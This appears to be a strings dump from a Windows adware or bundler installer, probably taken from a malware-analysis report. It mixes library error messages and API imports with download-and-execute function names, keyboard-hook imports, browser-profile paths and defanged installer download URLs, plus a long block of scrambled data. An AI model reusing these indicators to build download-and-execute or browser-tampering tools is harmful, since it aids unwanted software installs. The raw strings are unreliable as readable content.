presentCMS_SIGNERINFO_VERIFY_CERTCMS_RecipientInfo_set0_pkeyCMS_RecipientInfo_set0_keyCMS_RecipientInfo_ktri_cert_cmpcms_msgSigDigest_add1CMS_GET0_CERTIFICATE_CHOICESCMS_EncryptedData_set1_keyCMS_decrypt_set1_pkeyCMS_decrypt_set1_keyCMS_add1_recipient_certCMS_add0_recipient_keyCMS_add0_certunsupported requestorname typeno certificates in chainerror parsing urlPARSE_HTTP_LINE1OCSP_parse_urlOCSP_cert_id_newunimplemented public key methodinvalid cmd numberinvalid cmd namefailed loading public keyfailed loading private keycmd not executableENGINE_UNLOAD_KEYENGINE_load_ssl_client_certENGINE_load_public_keyENGINE_load_private_keyENGINE_get_pkey_methENGINE_get_pkey_asn1_methENGINE_ctrl_cmd_stringENGINE_ctrl_cmdENGINE_cmd_is_executableunsupported versionunsupported md algorithminvalid signer certificate purposeess signing certificate erroress add signing cert errorTS_VERIFY_CERTTS_TST_INFO_set_msg_imprintTS_RESP_CTX_set_signer_certTS_RESP_CTX_set_certsTS_REQ_set_msg_imprintTS_MSG_IMPRINT_set_algoTS_CHECK_SIGNING_CERTSESS_SIGNING_CERT_NEW_INITESS_CERT_ID_NEW_INITESS_ADD_SIGNING_CERTfunctionality not supportedWIN32_JOINERunsupported pkcs12 modekey gen errorPKCS8_add_keyusagePKCS12_PBE_keyivgenPKCS12_newpassPKCS12_MAKE_SHKEYBAGPKCS12_MAKE_KEYBAGPKCS12_key_gen_uniPKCS12_key_gen_ascPKCS12_add_localkeyidunsupported optionunable to get issuer keyidpolicy syntax not currently supportedoperation not definedno proxy cert policy language definedno issuer certificateextension setting not supportedV2I_EXTENDED_KEY_USAGEV2I_AUTHORITY_KEYIDS2I_SKEY_IDS2I_ASN1_SKEY_IDR2I_CERTPOLunsupported cipher typeunable to find certificatesigning not supported for this key typeoperation not supported on this typeno recipient matches keyno recipient matches certificateencryption not supported for this key typedecrypted key is wrong lengthPKCS7_add_certificateunsupported methodno port specifiedno port definedno accept port specifiedbroken pipeBIO_get_portECDH_compute_keydata too large for key sizeunsupported fieldpassed null parameternot a supported NIST primemissing private keykeys not setinvalid private keyPKEY_EC_SIGNPKEY_EC_PARAMGENPKEY_EC_KEYGENPKEY_EC_DERIVEPKEY_EC_CTRL_STRPKEY_EC_CTRLo2i_ECPublicKeyi2o_ECPublicKeyi2d_ECPrivateKeyEC_KEY_print_fpEC_KEY_printEC_KEY_newEC_KEY_generate_keyEC_KEY_copyEC_KEY_check_keyECKEY_TYPE2PARAMECKEY_PUB_ENCODEECKEY_PUB_DECODEECKEY_PRIV_ENCODEECKEY_PRIV_DECODEECKEY_PARAM_DECODEECKEY_PARAM2TYPEDO_EC_KEY_PRINTd2i_ECPrivateKeyzlib not supportedwrong public key typeunsupported public key typeunsupported encryption algorithmunsupported any defined by typeunknown public key typeunable to decode rsa private keyunable to decode rsa keystreaming not supportedprivate key header missingdigest and key type not supportedbad password readX509_PKEY_newi2d_RSA_PUBKEYi2d_PublicKeyi2d_PrivateKeyi2d_EC_PUBKEYi2d_DSA_PUBKEYd2i_X509_PKEYd2i_PublicKeyd2i_PrivateKeyd2i_AutoPrivateKeyunsupported algorithmunknown key typeunable to get certs public keypublic key encode errorpublic key decode errorno cert set for us to verifymethod not supportedloading cert dirkey values mismatchkey type mismatchcert already in hash tablecant check dh keyX509_verify_certX509_STORE_add_certX509_REQ_check_private_keyX509_PUBKEY_setX509_PUBKEY_getX509_load_cert_fileX509_load_cert_crl_fileX509_get_pubkey_parametersX509_check_private_keyGET_CERT_BY_SUBJECTADD_CERT_DIRPKEY_DSA_KEYGENPKEY_DSA_CTRLunsupported key componentsunsupported encryptionread keypublic key no rsaproblems getting passwordkeyblob too shortkeyblob header parse errorexpecting public key blobexpecting private key bloberror converting private keyPEM_WRITE_PRIVATEKEYPEM_READ_PRIVATEKEYPEM_READ_BIO_PRIVATEKEYPEM_PK8PKEYPEM_F_PEM_WRITE_PKCS8PRIVATEKEYDO_PK8PKEY_FPDO_PK8PKEYd2i_PKCS8PrivateKey_fpd2i_PKCS8PrivateKey_biounsupported salt typeunsupported private key algorithmunsupported prfunsupported key sizeunsupported key derivation functionunsupported keylengthunsuported number of roundsprivate key encode errorprivate key decode erroroperaton not initializedoperation not supported for this keytypeno operation setno key setkeygen failureinvalid operationexpecting a ec keyexpecting a ecdsa keyexpecting a dsa keyexpecting a dh keyexpecting an rsa keydifferent key typesctrl operation not implementedcommand not supportedcamellia key setup failedbn pubkey errorbad key lengthaes key setup failedPKEY_SET_TYPEPKCS5_v2_PBE_keyivgenPKCS5_PBE_keyivgenEVP_PKEY_verify_recover_initEVP_PKEY_verify_recoverEVP_PKEY_verify_initEVP_PKEY_verifyEVP_PKEY_sign_initEVP_PKEY_signEVP_PKEY_paramgen_initEVP_PKEY_paramgenEVP_PKEY_newEVP_PKEY_keygen_initEVP_PKEY_keygenEVP_PKEY_get1_RSAEVP_PKEY_get1_EC_KEYEVP_PKEY_GET1_ECDSAEVP_PKEY_get1_DSAEVP_PKEY_get1_DHEVP_PKEY_encrypt_oldEVP_PKEY_encrypt_initEVP_PKEY_encryptEVP_PKEY_derive_set_peerEVP_PKEY_derive_initEVP_PKEY_deriveEVP_PKEY_decrypt_oldEVP_PKEY_decrypt_initEVP_PKEY_decryptEVP_PKEY_CTX_dupEVP_PKEY_CTX_ctrl_strEVP_PKEY_CTX_ctrlEVP_PKEY_copy_parametersEVP_PKEY2PKCS8_brokenEVP_PKCS82PKEY_BROKENEVP_PKCS82PKEYEVP_CIPHER_CTX_set_key_lengthECKEY_PKEY2PKCS8ECDSA_PKEY2PKCS8DSA_PKEY2PKCS8DSAPKEY2PKCS8D2I_PKEYCAMELLIA_INIT_KEYAES_INIT_KEYinvalid public keyPKEY_DH_KEYGENPKEY_DH_DERIVEGENERATE_KEYCOMPUTE_KEYrsa operations not supportedkey size too smallinvalid keybitsillegal or unsupported padding modedigest too big for rsa keydata too small for key sizeRSA_generate_keyRSA_check_keyRSA_BUILTIN_KEYGENPKEY_RSA_VERIFYRECOVERPKEY_RSA_SIGNPKEY_RSA_CTRL_STRPKEY_RSA_CTRLinflate 1.2.5 Copyright 1995-2010 Mark Adlerinflate 1.1.3 Copyright 1995-1998 Mark Adler-3.7.8SQLite format 3CREATE TABLE sqlite_master(sql textCREATE TEMP TABLE sqlite_temp_master(REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY!"#$%&'()* ,-./:;?@[\]^_`{|}~%d.%d.%d.%dSoftware\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoiceSoftware\Classes\.htmldebug.txtunexpected key tokenexpected key token,[]{}#&*!|>'"%@`?,[]{}#&*!|>'"%@`tag:yaml.org,2002:#;/?:@&= $,_.!~*'()[]#;/?:@&= $_.~*'illegal map key?:,]}%@`large file support is disabledunknown operationSQL logic error or missing databaseforeign_keyssqlite_compileoption_getsqlite_compileoption_usedsqlite_logsqlite_source_idsqlite_versionsqlite_stat2sqlite_attachsqlite_detachsqlite_stat1sqlite_rename_parentsqlite_rename_triggersqlite_rename_tableRowKeySQLITE_
d-d-d d:d:d
d:d:d
d-d-d
failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
922337203685477580
API call with %s database connection pointer
OsError 0x%x (%u)
os_win.c:%d: (%d) %s(%s) - %s
delayed %dms for lock/sharing conflict
%s-shm
%s\etilqs_
Recovered %d frames from WAL file %s
cannot limit WAL size: %s
invalid page number %d
2nd reference to page %d
Failed to read ptrmap key=%d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
%d of %d pages missing from overflow list starting at %d
failed to get page %d
freelist leaf count too big on page %d
Page %d:
unable to get the page. error code=%d
btreeInitPage() returns error code %d
On tree page %d cell %d:
On page %d at right child:
Corruption detected in cell %d on page %d
Multiple uses for byte %d of page %d
Fragmentation of %d bytes reported as %d on page %d
Page %d is never used
Pointer map page %d is referenced
Outstanding page count goes from %d to %d during this analysis
unknown database %s
keyinfo(%d
%s(%d)
%s-mjX
foreign key constraint failed
unable to use function %s in the requested context
bind on a busy prepared statement: [%s]
zeroblob(%d)
abort at %d in [%s]: %s
constraint failed at %d in [%s]
cannot open savepoint - SQL statements in progress
no such savepoint: %s
cannot %s savepoint - SQL statements in progress
cannot rollback transaction - SQL statements in progress
cannot commit transaction - SQL statements in progress
sqlite_temp_master
sqlite_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
cannot change %s wal mode from within a transaction
database table is locked: %s
statement aborts at %d: [%s] %s
cannot open value of type %s
cannot open virtual table: %s
cannot open view: %s
no such column: "%s"
foreign key
indexed
cannot open %s column for writing
misuse of aliased aggregate %s
%s: %s.%s.%s
%s: %s.%s
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
Expression tree is too large (maximum depth %d)
variable number must be between ?1 and ?%d
too many SQL variables
too many columns in %s
EXECUTE %s%s SUBQUERY %d
misuse of aggregate: %s()
%.*s"%w"%s
%s%.*s"%w"
%s OR name=%Q
type='trigger' AND (%s)
sqlite_
table %s may not be altered
there is already another table or index with this name: %s
view %s may not be altered
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
sqlite_sequence
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Cannot add a PRIMARY KEY column
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_altertab_%s
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE %s=%Q
SELECT tbl, idx, stat FROM %Q.sqlite_stat1
invalid name: "%s"
too many attached databases - max %d
database %s is already in use
unable to open database: %s
no such database: %s
cannot detach database %s
database %s is locked
%s %T cannot reference objects in database %s
access to %s.%s.%s is prohibited
access to %s.%s is prohibited
object name reserved for internal use: %s
there is already an index named %s
too many columns on %s
duplicate column name: %s
default value of column [%s] is not constant
table "%s" has more than one primary key
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
no such collation sequence: %s
CREATE %s %.*s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE TABLE %Q.sqlite_sequence(name,seq)
view %s is circularly defined
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
table %s may not be dropped
use DROP TABLE to delete table %s
use DROP VIEW to delete view %s
DELETE FROM %s.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
foreign key on %s should reference only one column of table %T
number of columns in foreign key does not match the number of columns in the referenced table
unknown column "%s" in foreign key definition
indexed columns are not unique
table %s may not be indexed
views may not be indexed
virtual tables may not be indexed
there is already a table named %s
index %s already exists
sqlite_autoindex_%s_%d
table %s has no column named %s
CREATE%s INDEX %.*s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
no such index: %S
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
a JOIN clause is required before %s
unable to identify the object to be reindexed
table %s may not be modified
cannot modify %s because it is a view
foreign key mismatch
table %S has %d columns but %d values were supplied
%d values for %d columns
table %S has no column named %s
%s.%s may not be NULL
PRIMARY KEY must be unique
sqlite3_extension_init
unable to open shared library [%s]
no entry point [%s] in shared library [%s]
error during initialization: %s
automatic extension loading failed: %s
foreign_key_list
*** in database %s ***
unsupported encoding: %s
malformed database schema (%s)
%s - %s
unsupported file format
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
database schema is locked: %s
unknown or unsupported join type: %T %T%s%T
RIGHT and FULL OUTER JOINs are not currently supported
a NATURAL join may not have an ON or USING clause
cannot have both ON and USING clauses in the same join
cannot join using column %s - column not present in both tables
USE TEMP B-TREE FOR %s
COMPOUND SUBQUERIES %d AND %d %s(%s)
%s.%s
%s:%d
ORDER BY clause should come after %s not before
LIMIT clause should come after %s not before
SELECTs to the left and right of %s do not have the same number of result columns
no such index: %s
sqlite_subquery_%p_
no such table: %s
SCAN TABLE %s %s%s(~%d rows)
sqlite3_get_table() called with two or more incompatible queries
cannot create %s trigger on view: %S
cannot create INSTEAD OF trigger on table: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
no such trigger: %S
-- TRIGGER %s
no such column: %s
cannot VACUUM - SQL statements in progress
PRAGMA vacuum_db.synchronous=OFF
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
vtable constructor failed: %s
vtable constructor did not declare schema: %s
no such module: %s
table %s: xBestIndex returned an invalid plan
%s SUBQUERY %d
%s TABLE %s
%s AS %s
%s USING %s%sINDEX%s%s%s
%s USING INTEGER PRIMARY KEY
%s (rowid=?)
%s (rowid>? AND rowid)
%s (rowid>?)
%s (rowid)
%s VIRTUAL TABLE INDEX %d:%s
%s (~%lld rows)
at most %d tables in a join
cannot use index: %s
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
unable to close due to unfinished backup operation
unknown database: %s
no such %s mode: %s
%s mode not allowed: %s
no such vfs: %s
database corruption at line %d of [%.10s]
misuse at line %d of [%.10s]
cannot open file at line %d of [%.10s]
1.2.5
C:\appbuilder_v2\src\ComBroadcaster-1.10\Release\ComBroadcaster.pdb
SHELL32.dll
RPCRT4.dll
GetWindowsDirectoryW
GetCPInfo
PeekNamedPipe
GetProcessHeap
KERNEL32.dll
EnumChildWindows
EnumWindows
UnhookWindowsHookEx
GetKeyState
SetWindowsHookExW
GetAsyncKeyState
MapVirtualKeyW
GetKeyboardLayout
GetKeyboardState
CreateDialogIndirectParamW
GetKeyNameTextW
MapVirtualKeyExW
USER32.dll
GetViewportExtEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportOrgEx
GDI32.dll
WINSPOOL.DRV
COMDLG32.dll
RegOpenKeyExW
RegCloseKey
RegOpenKeyExA
RegCreateKeyExW
RegDeleteKeyW
RegEnumKeyExW
ADVAPI32.dll
ShellExecuteW
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
MSIMG32.dll
COMCTL32.dll
OLEACC.dll
GdiplusShutdown
gdiplus.dll
IMM32.dll
SHFileOperationW
VERSION.dll
WS2_32.dll
WINMM.dll
WLDAP32.dll
ReportEventA
.?AUDWebBrowserEvents2@@
.PAVCException@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCObject@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.PAVCOleException@@
.?AVCCmdTarget@@
.PAVCArchiveException@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCUserException@@
.PAVCResourceException@@
.PAVCFileException@@
.?AVCMDITabProxyWnd@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWnd@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWnd@@
.?AVCMFCToolBarCmdUI@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AVCMDIClientAreaWnd@@
.?AVCMFCRibbonCmdUI@@
.?AVCMFCCmdUsageCount@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCObList@@PAV3@@@
.?AVCMFCColorBarCmdUI@@
.?AV?$CMap@KKV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@
.?AVCMFCAcceleratorKey@@
.?AVCMFCRibbonKeyTip@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WHH@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
zcÃ
.?AV?$CAtlExeModuleT@VCDummyModule@@@ATL@@
.?AVUrlCatcher@@
Inappropriate I/O control opera
XiCCA"ggfynnr`nnt/bbA llu#pp1u00I`SSwXnnM\llv[99V)ggsmtt8FttGVNNV;WW1#VVs llwsjjaBoovPXXBruuH~00V{vvm$ddp%WW3?MME0kkpHoo3SkkrvttAwppfLddo;llJvFFE{uuJ=LLi wwf*ttP-uuJiXXx;WWz&ddyhxx38SSPXXXZYjjpqQQ1&jjJRxxJARRIpWWBcnnorppzgg1Gww2jMMRRCCs,ddL`ppNVSSEFoowqNNgijjKsllk"ppfPnn8kXXHZjjNGWWeyLL67mmN|ggM\XX1{qqW}vvHvggw WWNUeePnCCrfXXKRppddddU0CCH.VVP'ggseeV@jjGeVV4fxx1Dddk*uupXjjGnjj1illkSppz>ttA*WWrrMM24XXw_xxdySSe qqyebbGfqqamvvGzggz/ggvYXXf,ww4(jjoTmmcEaaV SSrvnnJcttw[RRt%llzrooRtQQN]bb6~QQAceeJ8XXvsFF3(SSpEbbR_SSx4ddJBbbp;jjZ'ppJ3LLbJuuN(nn5cQQ27oo3*WWxVVVn jj2MbbZ6QQJfjjfmww2fRRAkhhJ}oo3LkkmMxxU|XXf500KdCCeT33gYppB-xxlRjjpZnnpoQQ2F66h-ppA!MMBOyysgggvNggz/ggg[CCc=jjx)XXJvRRBPQQ1"ggV\ggJpww3cvveb33fXmmw&EEVxSSsntt8DttNygg1CggK/jjN?llx=ggLQoo1M33o[SS3bddqSnnx'XXb6ppKvVVd,ooN^llh9mmz XXG$WWZ&nnH}jjf#xxr|xx3,aa2Zpp3xXXx,wwpHaaH4pp23RRz*CCroNNYsCCJ*LL3Rww2lllt{mmJ(99HkwwvRXXmpxx4_jjbZppcOnnehjjzsggm-uuzgVVj1mmKSllp@mm3 ggL#llwf3hmmG'VVWWkkv5NNuDmmJ1NNkgbb2DggGRnnK,NNm6bbwgnn5{mmNM66H'ccGnXXNioo1l11VIllcFqqw|CCH4VVJ(vvJU00z3CCw"jjfxwwKqoo1?WWpfqqkSxxwJjjc^ppZ`qq3>xxKzVV5_ooZ:qqq_ww1PttP@XXr=XXUjvvpwxxm*ttx0aaP^nnvI66a'SSGkqqKiuuGZllbBjjsAxxGcxxJWRRzkSSx*LLvfnnK1NNGtmm3eNNCpSSZ:ggCAjjwALL3JQQH/NNrGXX2{LLnZkkc}XX4|hhNjeeEJggpjjz0WWKpqqbeppm%xx2`hhH$llIuuJL33P8XXw|66fXvvHm00cswwm_nns QQm|LLR*ppH nnf/ccK~XX5zbb2axxp5CCm@nnl$nnz6qqigXXKEggLyuuc]VVaNkkrEqqk(llZIVVgyoo2oww67SSrSggZ#ccJsnn2^vvf`ggP?ooe{LLK5ooKQHHZ!QQf1RRxVoo3,lluhppZtqqJ-SSH6llVvCCvq33gOjjxQjjwxCCGnXXWNCCHjVVM~uu4WxxxJggv7LL5#SSeg553?XXJ#ggj^xxfGEE3NttxA66mVjjrfllVTxxdvddH)wwrZNNhVQQJ\jjaJSSHZNNionndCooA66TPwwJs335TXXw2oo5hSSKfSSP6CCBvxx2;SSH!ggb(jjmSxxTpCCJ{xxvGllf5XXYYggK7xxo0ppfO996>llHA66z!uumÃY#XXzvXXm%WWcgdd8_vvK\MMEdggw6FFZTuu3hllT3ppHEqqv|bbH-uu5/llmPdde9nnZ$ww2hoo4,ww3wQQd(VVh\jjB~oo4pnnrsuu1dnnc0LLC0nn3>ggn"xxBppsAxxmCttBAEEBnbbcUqqE(llf 00IcbbvsNNY{ttGtMMBKXXcoqqH4yyJ.ddHnSS27II6\nnJj00A!nnc[nnNmSSB=66G,QQ2J11Bjyys$ggV4SSrNqqk*bbvd33N%ttG%MMBFnn2s33Zdnndw00Amnnxh99E{uuzfwwEnuupbaaENjjZlSSB$yyscggVRSSr@qqo"bbcHgg12QQJ xxAQttG3MMBNnnvO00A(nnc8LLT0ttBTEEBWbbc$qqECxxf]xxZ|XXs$tt8!ttKkxxEznnsZ66B&nnc}llV`uuz8aaEUuuz5ttYVbb2-00IrttBxEEB_bbc;qqEixxJ|xxA!SS2JNNT\QQB)tt88ttG)eeY/uuGzaaBiyyslggG vvxvnn3SWWdSjjfmggvz00k&XXH/dd88jjZWW13nnZouuHNRRkfooH@jjKGvvcQnnUCnnp#llIGmmf*33uybb1@00Bwkkx=NNkAvvw4HHZkllxJnne\wwrHVVrOmmc/MM17ggv;FFNGppvtuuRgQQ1Kddz7XX3N66M,bb2n33ZnxxKkLLzsttp[XX3QQQ1}ddu[xx44llJMQQJ-NNCybbN}FF5JxxdcXXz1ppZ ggu/jjNrjjL-ppcXNNZ}jjdANN1$mmK5FFN.SS4SXX3@ggB)LLseCCeGjjBBmmz&qqV,wwrWooZ^uupMNNy#CCK>LLW[bbc3SSPRuucGLL3kSSN^XXR"ggK"xxcgbbZ;ttZISSf/NNziCCwhllTpjjwSjj6dCCG/HHPoggG)XXf_mm3aVVHOnnHP00NCWWHDdddEuuw:llM>wwJmRRsann1HxxBfCCw&VVWJvvz@nnA~pp2YLLVjllK4nnH[ppBxttUIId1xxeeRRM-WWfWVVPASSNwggiallHx33w2bbvq66dKQQv9-9U9}9; ;$;(;,;0;; ;$;(;,;1%5u5z5: :$:(:,:0:>@>(?,?0?4?5P5U58 9$9(9,9094989: :$:(:,:0:4:8:8#8@8/9\91%1S1b15$51565\50"0'03080{07‡8c8p8y83#36"6-6#000@0{00"131@1~17*80848880#1*1?1{13#33383@30 0$0(0,000403 3$3(3,303\3= =$=(=,=0=3'313!5 5= =$=(=,=0=4=8=5_5M5 7,00040803 3$3(3,3037 8'80898[== =$=(=,=0=4=8=$0(0,00040805 5$5(5,5053%3x44 4$4(4,4044484: :$:(:,:; ;$;,;0;8;>(>,>0>4>|>>$>(>,>0>4>8>2 2$2(2,202?$?,?8?\?|?0 0(0005$5,545\5; ;,;0;8;0 0@0\0|0background-urlCB_DownloadAndExecCB_NavOpenUrlCB_OpenUrl%s\Google\Chrome\Application\chrome.exe\Mozilla Firefox\firefox.exe\places.sqlite\*.defaultFirefoxNcomctl32.dllNcomdlg32.dllNshell32.dll%s (%s:%d)f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cppAdvapi32.dllaccKeyboardShortcutwuser32.dllhhctrl.ocxf:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inlAfx:%p:%x:%p:%p:%pAfx:%p:%xcommctrl_DragListMsgkernel32.dllNf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cppf:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inldwmapi.dllUxTheme.dlleShell32.dllyDWrite.dllD2D1.dll%s:%x:%x:%x:%x%sMFCToolBar-%d%x%sMFCToolBar-%d%sMFCToolBarParametersTOOLBAR_RESETKEYBAORDKeyboardManagerMSG_CHECKEMPTYMINIFRAME%sDockingManager-%dMFCLink_UrlPrefixMFCLink_Urlf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp&%d %s%sMDIClientArea-%df:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cppf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleipfrm.cpp%sBasePane-%d%x%sBasePane-%d%sPane-%d%x%sPane-%dShowCmdUHex={X,X,X}R%sMFCOutlookBar-%d%x%sMFCOutlookBar-%df:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cppf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp%c%d%c%sf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olestrm.cpp%sDockablePaneAdapter-%d%x%sDockablePaneAdapter-%dENABLE_KEYSKEYS_MENUKEYS\RICHED20.DLLwindows\f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop2.cppRGB(%d, %d, %d)%sMFCTasksPane-%d%x%sMFCTasksPane-%dmscoree.dll- Attempt to initialize the CRT more than once.- CRT not initialized- floating point support not loadedInvalid parameter or key doesn't exist.Floating point (%%e, %%f, %%g, and %%G) is not supported by the WTL::CString class.%s-tmp"%s" "%s"%s has stopped workingError launching CrashSender.exeThe operation was cancelled by client.Couldn't launch CrashSender.exe process.Couldn't set C exception handlers for main execution thread.Couldn't create crash report directory.%s\CrashRpt\UnsentCrashReports\%s_%sLocal\CrashRptEvent_%sCouldn't load dbghelp.dll.crashrpt_lang.iniCrashSender.exe is not found in the specified path.CrashSender%d.exe%s %s Error ReportThe flag CR_INST_STORE_ZIP_ARCHIVES should be used with CR_INST_DONT_SEND_REPORT flag.Invalid registry key or invalid destination file is specified.The registry key coudn't be open.Empty subkey is not allowed.HKEY_CURRENT_USER\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion%u.%u.%u.%uMozillaChromeSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\77770555544333255554433325555443332ydebug.txt\%s\%s\%s\Internet Explorer\iexplore.exeinstall.batn.folder%Program Files%\gmsd_re_005010077\gmsd_re_005010077.exensq3D.tmp_240:.text`.rdata@.data.ndata.rsrcuDSSh.DEFAULT\Control Panel\InternationalSoftware\Microsoft\Windows\CurrentVersionGetWindowsDirectoryAKERNEL32.dllExitWindowsExUSER32.dllGDI32.dllSHFileOperationAShellExecuteASHELL32.dllRegEnumKeyARegCreateKeyExARegCloseKeyRegDeleteKeyARegOpenKeyExAADVAPI32.dllCOMCTL32.dllole32.dllVERSION.dllverifying installer: %d%%hXXp://nsis.sf.net/NSIS_Error... %d%%~nsu.tmp%u.%u%s%sRegDeleteKeyExA%s=%s*?|/":\"%CurrentUserName%"\LOCALS~1\Temp\nsd40.tmp\nsCBHTML5.dllhXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe.us/os/rm/OfferScreen_12_HD_v2.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd40.tmp\nsCBHTML5.dllC:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd40.tmpware\Microsoft\Windows\CurrentVersion\Uninstall^Opera,ER|HKCU^Software\Microsoft\Windows\CurrentVersion\Uninstall,DBNI|OtherthanIEDefault,DBNC|OtherthanChromeDefault,RE2|Opera Software,RE3|Opera SoftwareNullsoft Install System v11-Jul-2014.cvsGetProcessHeapOLEAUT32.dllWININET.dllMSVCRT.dllnsWeb.dll6(7.767;74<.pd>q.ya!%u 